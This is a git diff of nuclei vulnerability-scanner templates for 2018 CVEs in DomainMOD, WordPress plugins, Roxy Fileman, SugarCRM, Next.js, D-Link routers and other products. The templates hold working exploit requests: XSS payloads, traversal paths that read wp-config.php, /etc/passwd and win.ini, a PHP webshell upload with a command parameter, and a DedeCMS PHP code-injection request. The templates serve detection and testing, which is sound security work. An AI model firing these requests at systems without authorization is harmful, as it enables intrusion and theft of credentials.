vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://github.com/domainmod/domainmod/issues/88 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20011.yaml b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml new file mode 100644 index 0000000000..b48e1aa0cb --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-20011 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. + reference: + - https://www.exploit-db.com/exploits/46374/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20011 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve1028,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/category.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= + - | + GET /assets/categories.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20463.yaml b/nuclei-templates/CVE-2018/CVE-2018-20463.yaml index edd0c33519..dad08f7421 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20463.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20463.yaml @@ -1,26 +1,38 @@ id: CVE-2018-20463 info: - name: JSmol2WP <= 1.07 - Directory Traversal + name: WordPress JSmol2WP <=1.07 - Local File Inclusion author: vinit989 severity: high description: | - An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF. + WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Update to the latest version of the JSmol2WP plugin (>=1.08) or remove the plugin if it is not necessary. reference: - https://wpscan.com/vulnerability/9197 - https://wordpress.org/plugins/jsmol2wp/ + - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-20463 - - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-amp-SSRF + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20463 cwe-id: CWE-22 + epss-score: 0.01939 + epss-percentile: 0.88381 + cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal + verified: true + max-request: 1 + vendor: jsmol2wp_project + product: jsmol2wp + framework: wordpress + tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php" @@ -42,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502200faec7da2adad8d90967afee7532000ac3c1277e331cce4dc2cab2e16fbd160e022100a43079a7854c14db04a7ae1f89aabbeb67bd938f5e9b15294eae1181274685c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-20470.yaml b/nuclei-templates/CVE-2018/CVE-2018-20470.yaml index 913e599c3a..15ee6fd76f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20470.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20470.yaml @@ -1,21 +1,19 @@ id: CVE-2018-20470 info: - name: Tyto Sahi pro 7.x/8.x - Local File Inclusion + name: Sahi pro 7.x/8.x - Directory Traversal author: daffainfo severity: high - description: | - Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. + description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 + - https://www.cvedetails.com/cve/CVE-2018-20470 + tags: cve,cve2018,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-20470 cwe-id: CWE-22 - tags: cve,cve2018,lfi requests: - method: GET @@ -24,16 +22,13 @@ requests: matchers-condition: and matchers: - + - type: status + status: + - 200 - type: word - part: body words: - "bit app support" - "fonts" - "extensions" condition: and - - - type: status - status: - - 200 -# Enhanced by mp on 2022/06/17 + part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-20526.yaml b/nuclei-templates/CVE-2018/CVE-2018-20526.yaml index 2b79f67c74..0079a9708c 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20526.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20526.yaml @@ -6,21 +6,33 @@ info: severity: critical description: | Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system. + remediation: | + Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads. reference: - http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html - https://www.exploit-db.com/exploits/46085/ - https://nvd.nist.gov/vuln/detail/CVE-2018-20526 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-20526 cwe-id: CWE-434 + epss-score: 0.00666 + epss-percentile: 0.79248 + cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: roxyfileman + product: roxy_fileman google-query: intitle:"Roxy file manager" - verified: "true" - tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb + tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman -requests: +http: - raw: - | POST /php/upload.php HTTP/1.1 @@ -50,32 +62,25 @@ requests: Content-Type: application/octet-stream ------WebKitFormBoundary20kgW2hEKYaeF5iP-- - - | - GET /Uploads/{{randstr}}.php7?cmd=echo+"roxyfileman"+|+rev HTTP/1.1 + GET /Uploads/{{randstr}}.php7 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - - "namelifyxor" - - - type: word - part: header - words: - - text/html + - "f76d6a5f7491700cc3a678bdba2902d3" - type: status status: - 200 - -# Enhanced by mp on 2022/10/07 +# digest: 4a0a004730450220437d3c29a18e53486a8e39f9ad913b02a35912b2bcb3c21e63e069c76fe4f154022100a4d6a84d1e7d454bdc3f5c9758a7d44ea6d1c23ce4ad0a31a88d07f3a9aad85b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-20608.yaml b/nuclei-templates/CVE-2018/CVE-2018-20608.yaml index 10203a2f25..f7b54892cb 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20608.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20608.yaml @@ -5,23 +5,26 @@ info: author: ritikchaddha severity: high description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI. + impact: | + The vulnerability can lead to the exposure of sensitive information, such as server configuration details. remediation: | Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-20608 + - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20608 cwe-id: CWE-200 - epss-score: 0.03654 - epss-percentile: 0.90703 + epss-score: 0.0111 + epss-percentile: 0.84208 cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: txjia product: imcat - tags: cve,cve2018,imcat,phpinfo,config + tags: cve2018,cve,imcat,phpinfo,config,txjia http: - method: GET @@ -46,4 +49,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body -# digest: 480a0045304302207bbfe695fdf3797ec038d2e255d4b16760633a22259b96aa3b313c4c8a17b536021f42982c5df00518d9168b901393139e1d9b6495d8e642c24a4005998844225d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a172bf2d6f5205be1210274d0b843b9ed22d1642071ca1ef3f3a640f8041c9d022100965b93625f3e57ec307aa6beaba6e21a873855c77fcf4b7c48c63029bb2fffc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-2392.yaml b/nuclei-templates/CVE-2018/CVE-2018-2392.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-2392.yaml rename to nuclei-templates/CVE-2018/CVE-2018-2392.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-3810.yaml b/nuclei-templates/CVE-2018/CVE-2018-3810.yaml deleted file mode 100644 index 4874a8a4b4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-3810.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-3810 -info: - name: WordPress Smart Google Code Inserter Authentication Bypass - author: princechaddha - severity: critical - reference: https://www.exploit-db.com/exploits/43420 - tags: wordpress,cve,cve2018 -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode" - body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode' - headers: - Content-Type: application/x-www-form-urlencoded - - method: GET - path: - - "{{BaseURL}}/" - matchers-condition: and - matchers: - - type: word - words: - - "text/html" - part: header - - type: word - words: - - '' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-5316.yaml b/nuclei-templates/CVE-2018/CVE-2018-5316.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-5316.yaml rename to nuclei-templates/CVE-2018/CVE-2018-5316.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml b/nuclei-templates/CVE-2018/CVE-2018-5715.yaml index 5097ee9d4b..fc043311e1 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-5715.yaml @@ -1,44 +1,37 @@ id: CVE-2018-5715 - info: - name: SugarCRM 3.5.1 - Cross-Site Scripting + name: SugarCRM 3.5.1 - Reflected XSS author: edoardottt severity: medium - description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable). reference: - https://www.exploit-db.com/exploits/43683 + - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 - https://m4k4br0.github.io/sugarcrm-xss/ - https://www.exploit-db.com/exploits/43683/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-5715 cwe-id: CWE-79 metadata: - google-query: intext:"SugarCRM Inc. All Rights Reserved" + google-dork: intext:"SugarCRM Inc. All Rights Reserved" shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - tags: sugarcrm,xss,edb,cve,cve2018 - + tags: cve,cve2018,sugarcrm,xss requests: - method: GET path: - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word part: body words: - '&"/>=&"><< Back

' - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/08/11 diff --git a/nuclei-templates/CVE-2018/CVE-2018-6184.yaml b/nuclei-templates/CVE-2018/CVE-2018-6184.yaml index 96f81c4eda..522a51ae06 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-6184.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-6184.yaml @@ -6,26 +6,30 @@ info: severity: high description: | Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/NextFrameworkPathTraversal.java - https://github.com/zeit/next.js/releases/tag/4.2.3 - https://nvd.nist.gov/vuln/detail/CVE-2018-6184 + - https://github.com/lnick2023/nicenice + - https://github.com/masasron/vulnerability-research classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70586 + epss-percentile: 0.72998 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js shodan-query: html:"/_next/static" - tags: cve,cve2018,nextjs,lfi,traversal + tags: cve2018,cve,nextjs,lfi,traversal,zeit http: - method: GET @@ -42,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ec36d491882b47a3833f325a56f3d0564436dbb6cfd00ae68e2d1a687d5aded022100911abf6f4670157ff9bcb8ecb2d152c08553d66445f2f5009a7484f638d3e455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046ed6ab052aa19638a0ffc3dcbee16692a234b44a030f4b38d7b47aa8d9451c8022100f4af3e59fc9802e8697ff78159b0c24ed36a4c06abd1f7d3fe55618b7945eb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-6530.yaml b/nuclei-templates/CVE-2018/CVE-2018-6530.yaml index fc3e9f27d1..9555cd9020 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-6530.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-6530.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-6530 - https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto @@ -13,17 +17,18 @@ info: - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-6530 cwe-id: CWE-78 - epss-score: 0.94099 - cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:* + epss-score: 0.93644 + epss-percentile: 0.99057 + cpe: cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: d-link + vendor: dlink product: dir-860l_firmware - tags: cve,cve2018,d-link,rce,unauth,kev + tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink http: - raw: @@ -47,3 +52,4 @@ http: part: interactsh_request words: - "User-Agent: curl" +# digest: 4a0a00473045022100cb992aea6ed9345fa954525bb3ec088e711e697ac7be95a866d69a346c85e1290220143c40bfe9bf272a8000dcf2bff011c41a7b66adf23a45fa8ff59ecedae94609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-6910.yaml b/nuclei-templates/CVE-2018/CVE-2018-6910.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-6910.yaml rename to nuclei-templates/CVE-2018/CVE-2018-6910.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7251.yaml b/nuclei-templates/CVE-2018/CVE-2018-7251.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7251.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7251.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7282.yaml b/nuclei-templates/CVE-2018/CVE-2018-7282.yaml index 82a8c08013..f346c8cd40 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-7282.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-7282.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7282 cwe-id: CWE-89 - epss-score: 0.21784 - epss-percentile: 0.95966 + epss-score: 0.15744 + epss-percentile: 0.95443 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,7 +27,7 @@ info: product: printmonitor shodan-query: title:"PrintMonitor" product": printmonitor - tags: cve,cve2018,sqli,printmonitor,unauth + tags: cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" @@ -50,4 +50,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and -# digest: 4a0a00473045022100a333462c53d61a1014e13cf5f8bd3b44c8d1239c4ea61e90a056aed0baa6851d02200c72d3a23baa43e3b14aa0b33147e7611c4cd8383bb8a7538b26cd647d25cdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100943388e630f780887fc461ebd2b12bde74a8292ae62fade14d472388d6320299022100e0ef9ae2497c7b48c98c934d40e7a921b8c47516acc6bbcbb11c401c2c34ff5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-7467.yaml b/nuclei-templates/CVE-2018/CVE-2018-7467.yaml index 209cbb7767..4a8c9c5c27 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-7467.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-7467.yaml @@ -7,13 +7,13 @@ info: reference: - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 cwe-id: CWE-200 tags: cve,cve2018,axxonsoft,lfi + requests: - raw: - |+ diff --git a/nuclei-templates/CVE-2018/CVE-2018-7490.yaml b/nuclei-templates/CVE-2018/CVE-2018-7490.yaml deleted file mode 100644 index c65d3686b3..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7490.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2018-7490 -info: - name: uWSGI PHP Plugin Directory Traversal - author: madrobot - severity: high -requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:[x*]:0:0:" - part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-7653.yaml b/nuclei-templates/CVE-2018/CVE-2018-7653.yaml index 970645701a..1f4589ccf7 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-7653.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-7653.yaml @@ -11,13 +11,15 @@ info: - https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-7653 - https://github.com/ponyma233/YzmCMS/blob/master/YzmCMS_3.6_bug.md + - https://github.com/anquanquantao/iwantacve + - https://github.com/5ecurity/CVE-List classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - epss-percentile: 0.79636 + epss-percentile: 0.81235 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -25,7 +27,7 @@ info: product: yzmcms shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" - tags: packetstorm,cve,cve2018,yzmcms,cms,xss + tags: cve,cve2018,packetstorm,yzmcms,cms,xss http: - method: GET @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b71b670e8b34eb9ea8a93171af4744120ec76a79efd23e2a01b767c1880d6ec022100c8a4079f0f8bf2b7becaf974b21a49461cca86991f077443d8ba7cc117190ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200df73aa8ff0971cc80f47dd8d46f775cca36832a7ffa4d6c951b8503a4f9bf9f022100cf13ce4a2d6aaa51a72fc212a1d7dcd21c694f26d8614f626aeb56b566e7ed0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-7700.yaml b/nuclei-templates/CVE-2018/CVE-2018-7700.yaml deleted file mode 100644 index d834819ecb..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7700.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2018-7700 -info: - name: DedeCMS V5.7SP2 RCE - author: pikpikcu - severity: high - description: DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. - reference: - - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2018-7700 - cwe-id: CWE-352 - tags: cve,cve2018,dedecms,rce -requests: - - method: GET - path: - - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" - matchers-condition: and - matchers: - - type: word - words: - - "phpinfo" - - "PHP Version" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-7719.yaml b/nuclei-templates/CVE-2018/CVE-2018-7719.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7719.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7719.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-8727.yaml b/nuclei-templates/CVE-2018/CVE-2018-8727.yaml deleted file mode 100644 index a189afd517..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-8727.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-8727 -info: - name: Mirasys DVMS Workstation 5.12.6 Path Traversal - author: 0x_akoko - severity: high - description: Mirasys DVMS Workstation versions 5.12.6 and below suffer from a path traversal vulnerability. - reference: - - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html - - https://www.cvedetails.com/cve/CVE-2018-8727 - - https://www.onvio.nl/nieuws/cve-mirasys-vulnerability - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-8727 - cwe-id: CWE-22 - tags: cve,cve2018,mirasys,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-9118.yaml b/nuclei-templates/CVE-2018/CVE-2018-9118.yaml index 9db3695e3b..9f254e1203 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-9118.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-9118.yaml @@ -1,24 +1,23 @@ id: CVE-2018-9118 + info: name: WP Background Takeover, Directory Traversal <= 4.1.4 author: 0x_Akoko severity: high description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability - reference: - - https://www.exploit-db.com/exploits/44417 - - https://wpvulndb.com/vulnerabilities/9056 - - https://99robots.com/docs/wp-background-takeover-advertisements/ - - https://www.exploit-db.com/exploits/44417/ + reference: https://www.exploit-db.com/exploits/44417 + tags: wordpress,wp-plugin,lfi,cve,cve2018,traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-9118 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,cve,cve2018,traversal + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' + matchers-condition: and matchers: - type: word diff --git a/nuclei-templates/CVE-2018/CVE-2018-9161.yaml b/nuclei-templates/CVE-2018/CVE-2018-9161.yaml new file mode 100644 index 0000000000..d3295f40cc --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-9161.yaml @@ -0,0 +1,48 @@ +id: CVE-2018-9161 + +info: + name: PrismaWEB - Credentials Disclosure + author: gy741 + severity: critical + description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + impact: | + An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. + remediation: | + Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php + - 